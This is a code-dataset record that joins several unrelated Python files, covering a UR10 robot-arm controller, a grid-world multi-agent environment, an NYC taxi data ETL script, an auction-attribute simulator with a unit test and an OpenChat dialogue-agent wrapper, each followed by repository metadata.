new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def move_joints_with_grasp_constraints(self, joints_vec, dist_pivot,grasp_pivot,constant_axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def circular_pivot_motion(self, angle, dist_pivot,axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
pivot_new = S1.circular_motion(dist_pivot,angle,axis)
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
return new_xyzR
def do_circular_pivot_motion(self, angle, dist_pivot,axis,t,correction):
Sim = ur10_simulator()
self.read_joints()
wrist1 = copy(self.joints[5])
print("Wrist_old",wrist1)
Sim.set_joints(self.joints)
useless = copy(Sim.joints2pose())
new_xyzR = self.circular_pivot_motion(angle,dist_pivot,axis)
self.movej(new_xyzR,t)
time.sleep(t + 0.2)
self.read_joints()
newjoints = copy(self.joints)
# newjoints[5] = wrist1+correction
newjoints[5] = newjoints[5] + correction
self.movejoint(np.deg2rad(newjoints),2)
time.sleep(2.1)
self.read_joints()
print("Wrist_new",self.joints[5])
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
class URPoseManager():
def __init__(self):
#PROPERTY FOR MANAGING POSES (POSITIONS OR JOINTS)
self.dictKeys = list() #list containing the names of positions/joints
self.dictPosJoints = dict() #dictionary
self.dictRelativePos = dict() #dictionary for relative positions
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
def save(self,filename):
#open the file stream
f = open(filename,'w')
#loop through all the keys
for k in range(len(self.dictKeys)):
key = self.dictKeys[k]
value = self.dictPosJoints[key]
f.write(key + ' ' + value[0] + ' ')
[f.write(str(v)+' ') for v in value[1]]
f.write('\n')
f.close()
#load pose file
#filename should contain the full path for the file
def load(self,filename):
if os.path.isfile(filename):
with open(filename) as f:
lines = f.readlines()
#clear the current keys
self.dictKeys = list()
#clear the current dictionary
self.dictPosJoints = dict()
#for every line, split the string by new line and spaces
#the actual data will be stored as a list where each position
#will correspond to a position/joint in the file
data = [l.split('\n')[0].split(' ') for l in lines]
#save all the dictionary keys
self.dictKeys = [str(d[0]) for d in data]
#update the dictionary
#loop through all the keys
for k in range(len(self.dictKeys)):
print('loop')
posevec = [float(x) for x in data[k][2:8]]
value = [data[k][1],posevec]
self.dictPosJoints[self.dictKeys[k]] = value
#print(self.dictKeys) #debugging
#print(self.dictPosJoints) #debugging
return True #successfuly managed to load the files
else:
return False #could not find the file
#move the UR robot to the specified pose
def moveUR(self,urobj,name,time):
if name in self.dictKeys and name in self.dictPosJoints and isinstance(urobj,UR10Controller):
if self.dictPosJoints[name][0] == 'p':
urobj.movej(self.dictPosJoints[name][1],time)
elif self.dictPosJoints[name][0] == 'j':
urobj.movejoint(self.dictPosJoints[name][1],time)
return True
else:
return False
#get pose names
def getPoseNames(self):
return copy(self.dictKeys)
#get the joint position
def getPosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
return copy(self.dictPosJoints[name][1])
else:
return False #could not find the name
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
def addPosition(self,name,position):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['p',position]
return True
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
def addJoint(self,name,joint):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['j',joint]
return True
#removing a position/joint
def removePosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
del(self.dictKeys[self.dictKeys.index(name)])
del(self.dictPosJoints[name])
return True
else:
return False
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 11,431
| 1
| 776
|
072d2914c7508a4a27885c88e7923aafdfe723a6
| 4,133
|
py
|
Python
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | 2
|
2020-02-05T04:17:03.000Z
|
2021-05-24T04:07:36.000Z
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
"""A base class of an agent whose movement path is generated by using astar alg"""
############################################################################
# helper functions
@staticmethod
class Agent_v1(Agent):
"""Move_To_Target macro-action is terminated by reaching the goal.
The low level controller automatically set the latest
obvserved tagrget's position as the goal. If the target is flicked, the
previous target's location is continuely implemented."""
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
# target is flicked, then move towards the target position in previous obs
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
| 33.064
| 140
| 0.581176
|
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
"""A base class of an agent whose movement path is generated by using astar alg"""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
self.idx = idx
self.grid_dim = grid_dim
self.x_len, self.y_len = self.grid_dim
self.position = self.rand_position(*self.grid_dim)
self.agt_trans_noise = agent_trans_noise
self.cur_action = None
self.cur_action_time_left = 0.0
self.cur_action_done = True
def step(self, action, goal):
raise NotImplementedError
def astar_move(self, goal):
moves = self.wrap_positions(DIRECTION + self.position)
h = np.linalg.norm(goal-moves, axis=1)
dest_idx = np.random.choice(np.where(h == h.min())[0], size=1)[0]
trans = TRANSLATION_TABLE[dest_idx][np.random.choice(3, p=[self.agt_trans_noise/2, 1-self.agt_trans_noise, self.agt_trans_noise/2])]
self.position = (self.position+trans) % self.x_len
dist = np.linalg.norm(goal - self.position)
if dist < 0.1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
############################################################################
# helper functions
def _get_position_from_one_hot(self, goal):
index = goal.nonzero()[0]
X = index % self.x_len
Y = index // self.x_len
return np.concatenate([X,Y])
def _get_position_from_normalized(self, goal):
if all(goal[2:] == -1):
return goal[2:]
else:
return goal[2:] * self.x_len
@staticmethod
def rand_position(x_range, y_range):
return np.array([np.random.randint(x_range), np.random.randint(y_range)])
def wrap_positions(self, positions):
X, Y = np.split(positions,2,axis=1)
return np.concatenate([X%self.x_len, Y%self.y_len], axis=1)
class Agent_v1(Agent):
"""Move_To_Target macro-action is terminated by reaching the goal.
The low level controller automatically set the latest
obvserved tagrget's position as the goal. If the target is flicked, the
previous target's location is continuely implemented."""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
super(Agent_v1, self).__init__(idx, grid_dim, agent_trans_noise=agent_trans_noise)
self.pre_goal = np.array([-1,-1])
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
# target is flicked, then move towards the target position in previous obs
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
| 1,637
| 0
| 223
|
87af048da678fa17419acdfe0ee36bfcb3064335
| 4,026
|
py
|
Python
|
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
# -- Data Processing: Extract -- #
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 22.617978
| 79
| 0.513164
|
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
def visualize_data(df: pd.DataFrame):
pass
# Debug data frame.
DEBUG and preview(df, visualize_data.__name__)
# Return data frame for reuse.
return df
# -- Data Processing: Extract -- #
def extract_data(config: dict):
# Define an inner function to extract source data files.
def extract_files(type: str):
source.extract_files(
type,
config[type]['start_date'],
config[type]['end_date'],
)
# Create source.
source = etl.Source(SOURCE_FILE, SOURCE_URL, SOURCE_DIR)
# Extract trip records.
extract_files('yellow') # Yellow Taxi
extract_files('green') # Green Taxi
extract_files('fhv') # For-Hire Vehicle
extract_files('fhvhv') # High Volume For-Hire Vehicle
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
def percent(num, denom):
return 100 * num / denom
def preview(df: pd.DataFrame, func_name: str):
print(f'INSIDE {func_name}(): type =', type(df).__name__)
print(df.head(5))
def zScore(x, mean, std):
return (x - mean) / std
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 871
| 0
| 115
|
dcfb93be50b868f85e2e53dee2d5dd941c95ec50
| 4,100
|
py
|
Python
|
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
Base class for all click probability modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
# This is used since np does not want to accept tuple as an item and throws error that 'a must be 1-dimensional'
# dict keys (tuples) are converted to strings, then random choice is made using strings versions of keys, then
# results are passed to a final dict where keys are of their original form
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 33.606557
| 152
| 0.596098
|
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
Base class for all click probability modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
# This is used since np does not want to accept tuple as an item and throws error that 'a must be 1-dimensional'
# dict keys (tuples) are converted to strings, then random choice is made using strings versions of keys, then
# results are passed to a final dict where keys are of their original form
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
class TestAuctionsAttributes(unittest.TestCase):
def test_sanity(self):
Params = AuctionAttributesModule.Params
attributes_model = AuctionAttributesModule(
prior={
(0, 0): Params(p=45),
(0, 1): Params(p=25),
(1, 0): Params(p=235),
(1, 1): Params(p=76)},
seed=1234
)
number_of_auctions = [100, 1000, 10000, 15000, 50000, 150000, 300000, 500000]
for num in number_of_auctions:
choices_dict = attributes_model.get_auction_attributes(n=num)
#print(f'Throughout {num} auctions that were run, following segments were selected following number of times: {choices_dict}')
print ('Throughout {} auctions that were run, following segments were selected following number of times: {}').format(num, choices_dict)
self.assertTrue(True)
print("")
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 912
| 27
| 57
|
348061fbd3722432b2a2937544c82aef93786355
| 232
|
py
|
Python
|
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
| 46.4
| 122
| 0.732759
|
# -*- coding: utf-8 -*-
class InvalidCloudioAttributeTypeException(Exception):
def __init__(self, type):
super(InvalidCloudioAttributeTypeException, self).__init__(str(type) + ' is not a valid cloud.io attribute type!')
| 127
| 33
| 49
|
603e4e67758efe34205d8f7d4feea0a544dec0f7
| 3,871
|
py
|
Python
|
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | 8
|
2021-03-12T05:30:22.000Z
|
2022-01-26T09:36:40.000Z
|
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | null | null | null |
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | 3
|
2021-09-23T02:33:11.000Z
|
2022-01-18T18:59:18.000Z
|
import importlib
from parlai.core.agents import add_datapath_and_model_args
from parlai.core.build_data import modelzoo_path
from openchat.utils import (
inherit,
create_agent_from_opt_file_and_model_class,
)
from openchat.base import (
ParlaiGenerationAgent,
Seq2SeqLM,
ConvAI2Agent,
WizardOfWikipediaAgent,
)
| 33.66087
| 65
| 0.61302
|
import importlib
from parlai.core.agents import add_datapath_and_model_args
from parlai.core.build_data import modelzoo_path
from openchat.utils import (
inherit,
create_agent_from_opt_file_and_model_class,
)
from openchat.base import (
ParlaiGenerationAgent,
Seq2SeqLM,
ConvAI2Agent,
WizardOfWikipediaAgent,
)
class UnlikelihoodAgent(ParlaiGenerationAgent, Seq2SeqLM):
def __init__(self, model, device, maxlen=-1):
self.check_agent(model)
maxlen = maxlen if maxlen > 0 else self.default_maxlen()
if "wizard_of_wikipedia.context_and_label" in model:
name = "rep_wiki_ctxt_and_label"
elif "wizard_of_wikipedia.context" in model:
name = "rep_wiki_ctxt"
elif "wizard_of_wikipedia.label" in model:
name = "rep_label_ctxt"
elif "convai2.context_and_label" in model:
name = "rep_convai2_ctxt_and_label"
elif "convai2.context" in model:
name = "rep_convai2_ctxt"
elif "convai2.label" in model:
name = "rep_convai2_label"
elif "convai2.vocab.alpha.1e-0" in model:
name = "vocab_alpha1e0"
elif "convai2.vocab.alpha.1e-1" in model:
name = "vocab_alpha1e1"
elif "convai2.vocab.alpha.1e-2" in model:
name = "vocab_alpha1e2"
elif "convai2.vocab.alpha.1e-3" in model:
name = "vocab_alpha1e3"
elif "eli5.context_and_label" in model:
name = "rep_eli5_ctxt_and_label"
elif "eli5.context" in model:
name = "rep_eli5_ctxt"
elif "eli5.label" in model:
name = "rep_eli5_label"
else:
raise Exception(f"wrong model: {model}")
option, model_class = self.set_options(
name=f"zoo:dialogue_unlikelihood/{name}/model",
path="projects.dialogue_unlikelihood.agents",
class_name="RepetitionUnlikelihoodAgent",
)
super().__init__(
device=device,
name=model,
maxlen=maxlen,
suffix="\n",
model=create_agent_from_opt_file_and_model_class(
opt=option,
model_class=model_class,
),
)
if "wizard_of_wikipedia" in model:
inherit(self, (WizardOfWikipediaAgent, Seq2SeqLM))
self.build_wizard_of_wikipedia()
elif "convai2" in model:
inherit(self, (ConvAI2Agent, Seq2SeqLM))
@staticmethod
def available_models():
return [
"unlikelihood.wizard_of_wikipedia.context_and_label",
"unlikelihood.wizard_of_wikipedia.context",
"unlikelihood.wizard_of_wikipedia.label",
"unlikelihood.convai2.context_and_label",
"unlikelihood.convai2.context",
"unlikelihood.convai2.label",
"unlikelihood.convai2.vocab.alpha.1e-0",
"unlikelihood.convai2.vocab.alpha.1e-1",
"unlikelihood.convai2.vocab.alpha.1e-2",
"unlikelihood.convai2.vocab.alpha.1e-3",
"unlikelihood.eli5.context_and_label",
"unlikelihood.eli5.context",
"unlikelihood.eli5.label",
]
def set_options(self, name, path, class_name, device):
option = {
"n_image_tokens": 1,
"n_image_channels": 1,
"image_fusion_type": "late",
}
add_datapath_and_model_args(option)
datapath = option.get('datapath')
option['model_file'] = modelzoo_path(datapath, name)
option["override"] = {
"no_cuda": False if "cuda" in device else True,
}
my_module = importlib.import_module(path)
model_class = getattr(my_module, class_name)
return option, model_class
@staticmethod
def default_maxlen():
return 128
| 3,328
| 181
| 23
|
b11059298c8234b3e10476c7c2a4e80a7072ec74
| 1,085
|
py
|
Python
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
